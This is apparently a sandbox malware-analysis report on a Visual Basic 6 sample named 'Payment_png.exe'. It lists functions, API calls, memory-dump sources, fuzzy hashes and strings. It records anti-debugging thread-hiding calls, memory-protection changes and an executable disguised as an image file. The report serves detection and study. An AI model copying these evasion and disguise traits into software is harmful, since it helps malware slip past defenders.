Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03e9c0556aa98d4d2bc3d6b8dba4070f16ee1b7e2763385f75a2371bb9633c15
Instruction ID: c6b2578ff0bc7c085bf031ccd696399c433083876004ee4bc0c630dc9a87e5bc
Opcode Fuzzy Hash: 03e9c0556aa98d4d2bc3d6b8dba4070f16ee1b7e2763385f75a2371bb9633c15
Instruction Fuzzy Hash: 6F21AC70664350FFEB396B80C869FA47775EF04710F608490EE061E0BEE7B29899CE21

Uniqueness

Uniqueness Score: -1.00%

Function 02224377, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 406642e6661dcaafe51e0263acce7f6f06b144092ba916c1e92ec0bcbaf53476
Instruction ID: 382eb670a4f1cdfba753ddf81ff3ad14197ff6f156ce0031eea670af39a867a6
Opcode Fuzzy Hash: 406642e6661dcaafe51e0263acce7f6f06b144092ba916c1e92ec0bcbaf53476
Instruction Fuzzy Hash: 2DF08275320712EFC716EA44E7D4B0673A2AF44310F724564EC01CB215DB36EC44C510

Uniqueness

Uniqueness Score: -1.00%

Function 02222415, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b3633c4683661702586acb2780b0458dedff27f30061856e52feea0193fd96e
Instruction ID: 395013c311eb104dd7082343ccc2a78fd459064520381a8362a6dc1a8b6bb0aa
Opcode Fuzzy Hash: 4b3633c4683661702586acb2780b0458dedff27f30061856e52feea0193fd96e
Instruction Fuzzy Hash: 63C04CB62009818BEF02DE08D591B507364FF29644B440490D405CF725E215E9408600

Uniqueness

Uniqueness Score: -1.00%

Function 02223BE9, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d43583480a62d383fbf5b653a91f2d92e1aa83f9347af19faab46cdfb5af8da8
Instruction ID: 1f7f9d16db02f71c1a54d31177e74c80074ab046754606d6154150eace8d0bf2
Opcode Fuzzy Hash: d43583480a62d383fbf5b653a91f2d92e1aa83f9347af19faab46cdfb5af8da8
Instruction Fuzzy Hash: A7C04C30635950DBCD55DA49C140B5073B5A710B94F4614C1E9535BB55C36AD984D641

Uniqueness

Uniqueness Score: -1.00%

Function 00413FA0, Relevance: 40.7, APIs: 27, Instructions: 172COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00414010
__vbaStrCopy.MSVBVM60 ref: 00414018
__vbaStrCopy.MSVBVM60 ref: 00414020
__vbaAryConstruct2.MSVBVM60(?,00403E74,00000011), ref: 0041402D
__vbaStrToAnsi.MSVBVM60(?,?,00000000,0002003F,?), ref: 0041404B
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041405F
__vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041406D
__vbaFreeStr.MSVBVM60(?,00000000), ref: 00414076
__vbaStrToAnsi.MSVBVM60(?,?,?,?,00000000), ref: 00414088
__vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00000000), ref: 00414098
__vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004140AA
__vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 004140BE
__vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 004140C8
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 004140DA
__vbaStrCopy.MSVBVM60 ref: 004140EF
__vbaUbound.MSVBVM60(00000001,?), ref: 004140FC
#617.MSVBVM60(?,?,-00000001), ref: 0041412A
__vbaStrVarMove.MSVBVM60(?), ref: 00414134
__vbaStrMove.MSVBVM60 ref: 0041413F
__vbaFreeVar.MSVBVM60 ref: 00414148
__vbaSetSystemError.MSVBVM60(?), ref: 00414164
__vbaFreeStr.MSVBVM60(004141C1), ref: 00414197
__vbaFreeStr.MSVBVM60 ref: 0041419C
__vbaFreeStr.MSVBVM60 ref: 004141A1
__vbaFreeStr.MSVBVM60 ref: 004141A6
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 004141BA

Memory Dump Source

Source File: 00000000.00000002.246757240.000000000040E000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.246722797.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.246732813.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.246772099.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.246784901.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Copy$AnsiErrorSystemUnicode$Move$#617Construct2DestructListUbound
String ID:
API String ID: 901077922-0
Opcode ID: 6e753a9b337ee7cf9dedc62dbad57d2d14ec09a26f8edcf14b89b8e6847e73a7
Instruction ID: 1116824dd1d30b9975858bb6bbdc69392d024d3f32117b01c63a9b87ff846030
Opcode Fuzzy Hash: 6e753a9b337ee7cf9dedc62dbad57d2d14ec09a26f8edcf14b89b8e6847e73a7
Instruction Fuzzy Hash: 1561E8B5D00219ABCB04DFA4DD88ADEBBB8FF48700F10816AF505B7264DB749A45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004137A0, Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 004137F5
__vbaI4Str.MSVBVM60(00403B90), ref: 00413800
#608.MSVBVM60(?,00000000), ref: 0041380B
__vbaVarTstNe.MSVBVM60(?,?), ref: 00413827
__vbaFreeVar.MSVBVM60 ref: 00413839
__vbaNew2.MSVBVM60(0040301C,0qV), ref: 00413857
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413870
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403CC8,00000110), ref: 00413897
__vbaInStr.MSVBVM60(00000000,?,Undtag3,FFDFEB6E), ref: 004138AC
__vbaFreeStr.MSVBVM60 ref: 004138B5
__vbaFreeObj.MSVBVM60 ref: 004138BE
__vbaNew2.MSVBVM60(0040301C,0qV), ref: 004138D7
__vbaObjSet.MSVBVM60(?,00000000), ref: 004138F0
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403CC8,00000158), ref: 00413917
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00413927
__vbaI4Var.MSVBVM60(00000000), ref: 00413931
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413944
__vbaFreeVar.MSVBVM60 ref: 00413950
__vbaFreeStr.MSVBVM60(00413990), ref: 00413989

Strings

0qV, xrefs: 00413844, 0041384D, 0041385D, 004138C4, 004138CD, 004138DD
Undtag3, xrefs: 004138A5

Memory Dump Source

Source File: 00000000.00000002.246757240.000000000040E000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.246722797.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.246732813.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.246772099.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.246784901.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultNew2$#608CallCopyLateList
String ID: 0qV$Undtag3
API String ID: 4049801908-831992603
Opcode ID: ab80eeb9d409033c9e1e39b78c734fff84970913b2aa3d720ea71167267c21f8
Instruction ID: d90c8967ccb3a4ac86dbe2d0cf39ea6476e6744112b3e8f10bfc358dd1a6ac6b
Opcode Fuzzy Hash: ab80eeb9d409033c9e1e39b78c734fff84970913b2aa3d720ea71167267c21f8
Instruction Fuzzy Hash: 35511C75900248EBCB04DFA5DD88EDEBBB8FF88701B108426F542B72A0D7749945CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00413B20, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00413B60
#591.MSVBVM60(?), ref: 00413B78
__vbaStrMove.MSVBVM60 ref: 00413B83
__vbaStrCmp.MSVBVM60(Long,00000000), ref: 00413B8F
__vbaFreeStr.MSVBVM60 ref: 00413BA2
__vbaFreeVar.MSVBVM60 ref: 00413BAB
__vbaNew2.MSVBVM60(00403DB0,0041536C), ref: 00413BC8
__vbaObjVar.MSVBVM60(?), ref: 00413BDA
__vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00413BE5
__vbaHresultCheckObj.MSVBVM60(00000000,021EEDD4,00403DA0,00000010), ref: 00413BFF
__vbaFreeObj.MSVBVM60 ref: 00413C08
__vbaFreeVar.MSVBVM60(00413C53), ref: 00413C43
__vbaFreeStr.MSVBVM60 ref: 00413C4C

Strings

Long, xrefs: 00413B8A

Memory Dump Source

Source File: 00000000.00000002.246757240.000000000040E000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.246722797.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.246732813.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.246772099.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.246784901.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#591AddrefCheckCopyHresultMoveNew2
String ID: Long
API String ID: 2040824620-2611283542
Opcode ID: 50d572dd3a721d9339963082308f1dae20a8186d7a675beb13c524e2a3ff956a
Instruction ID: cadc68d75937a769596d29a9dea21d9a17ab81f3b339b4ccc8987b623ca14276
Opcode Fuzzy Hash: 50d572dd3a721d9339963082308f1dae20a8186d7a675beb13c524e2a3ff956a
Instruction Fuzzy Hash: 1E314E75800658EBCB14DFA4DE48ADDBBB8FF58705F10412AF452B7160DB741A45CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004135B0, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

#677.MSVBVM60(00000000,3FF00000,00000000,3FF00000,00000000,40100000,?,?), ref: 0041361D
__vbaFpR8.MSVBVM60 ref: 00413623
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041364E
__vbaNew2.MSVBVM60(0040301C,0qV), ref: 00413678
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413691
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403CC8,00000110), ref: 004136B8
__vbaLateMemCall.MSVBVM60(?,zJBAJdnPI93,00000003), ref: 00413730
__vbaFreeObj.MSVBVM60 ref: 0041373C
__vbaFreeVar.MSVBVM60 ref: 00413745
__vbaFreeObj.MSVBVM60(00413783), ref: 0041377C

Strings

0qV, xrefs: 00413660, 0041366E, 0041367E
zJBAJdnPI93, xrefs: 00413727

Memory Dump Source

Source File: 00000000.00000002.246757240.000000000040E000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.246722797.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.246732813.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.246772099.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.246784901.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#677CallCheckHresultLateListNew2
String ID: 0qV$zJBAJdnPI93
API String ID: 4153924771-235173844
Opcode ID: 42bf9ee9a70a7ec0608a53215c71466f11bf3213b5c453960a0d11401b2cc8c3
Instruction ID: f4b60c382a8efb22e081bd754135fac526424c6af26dc27b8f9006899d1af3a4
Opcode Fuzzy Hash: 42bf9ee9a70a7ec0608a53215c71466f11bf3213b5c453960a0d11401b2cc8c3
Instruction Fuzzy Hash: A5514BB4D00208AFCB14DFA9D945ADEBBB8FF48700F10802AE555B73A1D7745941CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00413D90, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

__vbaInStrB.MSVBVM60(00000000,00403DD0,ABC,00000002,?,?,?,?,?,?,?,004011C6), ref: 00413DCE
__vbaNew2.MSVBVM60(0040301C,0qV,?,?,?,?,?,?,?,004011C6), ref: 00413DEC
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,004011C6), ref: 00413E05
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403CB8,00000198,?,?,?,?,?,?,?,004011C6), ref: 00413E2C
#531.MSVBVM60(?,?,?,?,?,?,?,?,004011C6), ref: 00413E36
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,004011C6), ref: 00413E3F
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,004011C6), ref: 00413E48

Strings

0qV, xrefs: 00413DD9, 00413DE2, 00413DF2
ABC, xrefs: 00413DBB

Memory Dump Source

Source File: 00000000.00000002.246757240.000000000040E000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.246722797.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.246732813.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.246772099.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.246784901.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#531CheckHresultNew2
String ID: 0qV$ABC
API String ID: 3178340634-833649680
Opcode ID: 15948cacba5b7c571c701e11065420216cb730f72b8980479c5b782ff1f3717b
Instruction ID: 42328d9141426bcd3725d35747622289b4b2bafc709a4f033173e2e531894f29
Opcode Fuzzy Hash: 15948cacba5b7c571c701e11065420216cb730f72b8980479c5b782ff1f3717b
Instruction Fuzzy Hash: 0A116074540345EBC710DF94CD8AEEEBBBCEB88702F604426F141B22A0C7785A41CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00413E80, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60(\MSINFO32.EXE,00000000), ref: 00413ED2
__vbaStrMove.MSVBVM60 ref: 00413EDD
__vbaVarDup.MSVBVM60 ref: 00413F13
#595.MSVBVM60(?,00000000,?,?,?), ref: 00413F2A
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00413F42
__vbaFreeStr.MSVBVM60(00413F79), ref: 00413F72

Strings

System Information Is Unavailable At This Time, xrefs: 00413F05
\MSINFO32.EXE, xrefs: 00413EBB

Memory Dump Source

Source File: 00000000.00000002.246757240.000000000040E000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.246722797.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.246732813.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.246772099.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.246784901.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#595ListMove
String ID: System Information Is Unavailable At This Time$\MSINFO32.EXE
API String ID: 2404876520-4099109778
Opcode ID: 3fd80aa0a8a3f165b397289e8038094bbb4f94cabdee2cf904c7523ed8c61017
Instruction ID: 1f062cd322787dff8af06021a60220c8e0ee28fd02f5f4e415edbb28e059bc99
Opcode Fuzzy Hash: 3fd80aa0a8a3f165b397289e8038094bbb4f94cabdee2cf904c7523ed8c61017
Instruction Fuzzy Hash: 2331B5B1C00208AFCB04DFD9D945ADEBBB8EB48701F10C12AF526BB254DB745605CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00413C80, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,004011C6), ref: 00413CC3
__vbaInStr.MSVBVM60(00000000,00403DD0,ABC,00000002,?,?,?,?,?,?,?,?,?,?,004011C6), ref: 00413CD6
__vbaNew2.MSVBVM60(00403DB0,0041536C,?,?,?,?,?,?,?,?,?,?,004011C6), ref: 00413CF3
__vbaHresultCheckObj.MSVBVM60(00000000,021EEDD4,00403DA0,0000001C,?,?,?,?,?,?,?,?,?,?,004011C6), ref: 00413D18
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403DD4,00000050,?,?,?,?,?,?,?,?,?,?,004011C6), ref: 00413D38
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,004011C6), ref: 00413D41
__vbaFreeStr.MSVBVM60(00413D62,?,?,?,?,?,?,?,?,?,?,004011C6), ref: 00413D5B

Strings

ABC, xrefs: 00413CCB

Memory Dump Source

Source File: 00000000.00000002.246757240.000000000040E000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.246722797.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.246732813.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.246772099.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.246784901.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$CopyNew2
String ID: ABC
API String ID: 3978771648-2743272264
Opcode ID: c2e7612b591df74b820f988dabcc5aa301c6dd4c2daa4da6ba71c23f7b9e8179
Instruction ID: 23a48eaf4de9fbba966a66bcf43d31bd8d3102fb0ce4005cf10400487c824263
Opcode Fuzzy Hash: c2e7612b591df74b820f988dabcc5aa301c6dd4c2daa4da6ba71c23f7b9e8179
Instruction Fuzzy Hash: 45213D74940649EBCB149F55DD4AEAEBFB8FF48741F20802AF511B72A0C7785A42CF98

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Payment_png.exe PID: 3112 Parent PID: 6076 Payment_png.exeCOMMON

Executed Functions

Function 00565301, Relevance: 1.6, APIs: 1, Instructions: 108nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?), ref: 00565572

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 067320fd095e98cba0e919413ebf2e76ef28116eeb66891945f4f6caa2295453
Instruction ID: d15624f7ae42f68c4b82c9800643cffe90d9a19ba26c27d2f3ccb5f550a0f5ce
Opcode Fuzzy Hash: 067320fd095e98cba0e919413ebf2e76ef28116eeb66891945f4f6caa2295453
Instruction Fuzzy Hash: 2B41AB72A49A01DFDB3A5B10C44C3A8BBB2FF25320F589955D4138B879F76188C9CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00565331, Relevance: 1.6, APIs: 1, Instructions: 92nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?), ref: 00565572

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: fa908105ec9279035a210d939aed7315216ddc7b43929cb05b9b9849203c14e5
Instruction ID: a6a854b29c792b9773ad7e338a260f0a979b48d61d39f60916cc3856b647f6d3
Opcode Fuzzy Hash: fa908105ec9279035a210d939aed7315216ddc7b43929cb05b9b9849203c14e5
Instruction Fuzzy Hash: 0F31C130684A06CFEF298E24C49C7A47EE3BF65315FA55A6AD5038B5A0FB7588C4CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00565338, Relevance: 1.6, APIs: 1, Instructions: 92nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?), ref: 00565572

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: d786012c73bad5093d89e62b2ab90227b75cb1db2458c2033ce519c93d4a0e84
Instruction ID: 0c3312c71895cf3dd264845a8f19a9597c2b9af897b09ec9ab32ceb26abb9c83
Opcode Fuzzy Hash: d786012c73bad5093d89e62b2ab90227b75cb1db2458c2033ce519c93d4a0e84
Instruction Fuzzy Hash: F831ED31A44902CFDB3A4F10C40C7A8BBA2FF65321F989966D5038B9B8F77188C4CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00565380, Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?), ref: 00565572

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: bd5d74628ddb258df25eebd001c16b032c6aa4e964591450b13e35300b725aef
Instruction ID: 6db320919d8d2d548d68430394d73bbf8a2b81ca8f85d42886ac75cf732a3c8b
Opcode Fuzzy Hash: bd5d74628ddb258df25eebd001c16b032c6aa4e964591450b13e35300b725aef
Instruction Fuzzy Hash: 35219C31A85906DFDB395F10C40C7A87BA2FF25321F999996D5138B8B9F77188C8CB81

Uniqueness

Uniqueness Score: -1.00%

Function 005653B4, Relevance: 1.6, APIs: 1, Instructions: 76nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?), ref: 00565572

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: ecd64982b08d653b73acdbe1676eff051c6c0d2884503ac9c9e9cfa10beb5037
Instruction ID: 62e4c599ef19ad3439490ab2854e33bbda741db4f69b6ac7069b0d725fefa4f0
Opcode Fuzzy Hash: ecd64982b08d653b73acdbe1676eff051c6c0d2884503ac9c9e9cfa10beb5037
Instruction Fuzzy Hash: EC21A171A45902CFDB395B10C40C7A47BA2FF25321F999956D5138B8B8F77188C4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 005653EF, Relevance: 1.6, APIs: 1, Instructions: 68nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?), ref: 00565572

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: bd7d1970afd26ff3fccc9ec9382509d38d09ecbdc1a4235a65eae98ad5b38af5
Instruction ID: 0dd3debf7c66c1273da6000c30dd9c3e0f07bd82f15e38705532925c05f32612
Opcode Fuzzy Hash: bd7d1970afd26ff3fccc9ec9382509d38d09ecbdc1a4235a65eae98ad5b38af5
Instruction Fuzzy Hash: 7E21CD71A45A02CFDB295B20C40C7A47FE2FF21321F98A999D5134B8B9F77188C4CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0056542F, Relevance: 1.6, APIs: 1, Instructions: 62nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?), ref: 00565572

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 9036a4e00e09656e47e41850daca867e6a8e874f474f2b7fb571fdaa20066f31
Instruction ID: 345793efa0f5ccb1bc5ebcb843851efd071c940f9ad574307f2a622be896b460
Opcode Fuzzy Hash: 9036a4e00e09656e47e41850daca867e6a8e874f474f2b7fb571fdaa20066f31
Instruction Fuzzy Hash: 82219D31A45A06CFDB3A5B20C00C7A47FA2FF21321F995995D4134B879F77188C8CB82

Uniqueness

Uniqueness Score: -1.00%

Function 005654CB, Relevance: 1.5, APIs: 1, Instructions: 34nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?), ref: 00565572

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 2d1db78a1d81a22e62bf1ecc27a5fcafff1873da463394e805917fcfe0571859
Instruction ID: 13e12494b2fdc135d1408f6d3490be86e2f17401c64fc328f98df78cbb6ded90
Opcode Fuzzy Hash: 2d1db78a1d81a22e62bf1ecc27a5fcafff1873da463394e805917fcfe0571859
Instruction Fuzzy Hash: 73F06D32B5A942CFC72E5B64C01C1E47FB2FD2672079C9C4088138B83CF62248C9CB81

Uniqueness

Uniqueness Score: -1.00%

Function 005654F5, Relevance: 1.5, APIs: 1, Instructions: 31nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?), ref: 00565572

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: ae0c7b2873d4c2a24705e35a72a99c03c93b170a1e5d9b1cadcaa9f9feaf0afe
Instruction ID: fcc3b0940f5b1c00a368892d9c3fadec8e43648001abb3fdb8d11657c4732b3b
Opcode Fuzzy Hash: ae0c7b2873d4c2a24705e35a72a99c03c93b170a1e5d9b1cadcaa9f9feaf0afe
Instruction Fuzzy Hash: 31F04932B09641CFD72EAB60C08D3947FB6FF12604B98989498134B83EF22118DACF91

Uniqueness

Uniqueness Score: -1.00%

Function 00565544, Relevance: 1.5, APIs: 1, Instructions: 21nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?), ref: 00565572

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 8e32ee2e504126286bf8aa7957d60147f9c761e93e37d04b61f8000f741c99a3
Instruction ID: 992447fb60fd4178f7083c43e172648c65c8dcbb834459421fd17afc42b80015
Opcode Fuzzy Hash: 8e32ee2e504126286bf8aa7957d60147f9c761e93e37d04b61f8000f741c99a3
Instruction Fuzzy Hash: 3DE0E572B16A00DF87AFAB51C04D188BB79FE49650724DC4498134EC3DF2622CEE8F91

Uniqueness

Uniqueness Score: -1.00%

Function 00564EE8, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00564BD1,00000040,00561DB6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564F01

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E966A

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 90b9e6b8f08d09ef9db0928ab95fa49aaace9d452eec4e390a8ec9c53589278a
Instruction ID: d7120df0c0bff832feb751c2d6cf20db8c34a0f26c3637532aecb1b89763b53f
Opcode Fuzzy Hash: 90b9e6b8f08d09ef9db0928ab95fa49aaace9d452eec4e390a8ec9c53589278a
Instruction Fuzzy Hash: E890027520100846D180715A440C74E000557D1741FD2C125E0115614DCA598A5977E2

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E96EA

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb1c8d2d5fcb3733ec673507c55813644e377effc53bdebf322cf91ba5284f9b
Instruction ID: ef5b253acdb7bcb6d85f0a1095bd9f4498dfa1aaff230f2d729c8b345bbe54da
Opcode Fuzzy Hash: cb1c8d2d5fcb3733ec673507c55813644e377effc53bdebf322cf91ba5284f9b
Instruction Fuzzy Hash: BC90027520108846D110615A840C74E000557D0741FD6C521E4514618D86D988917162

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E971A

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
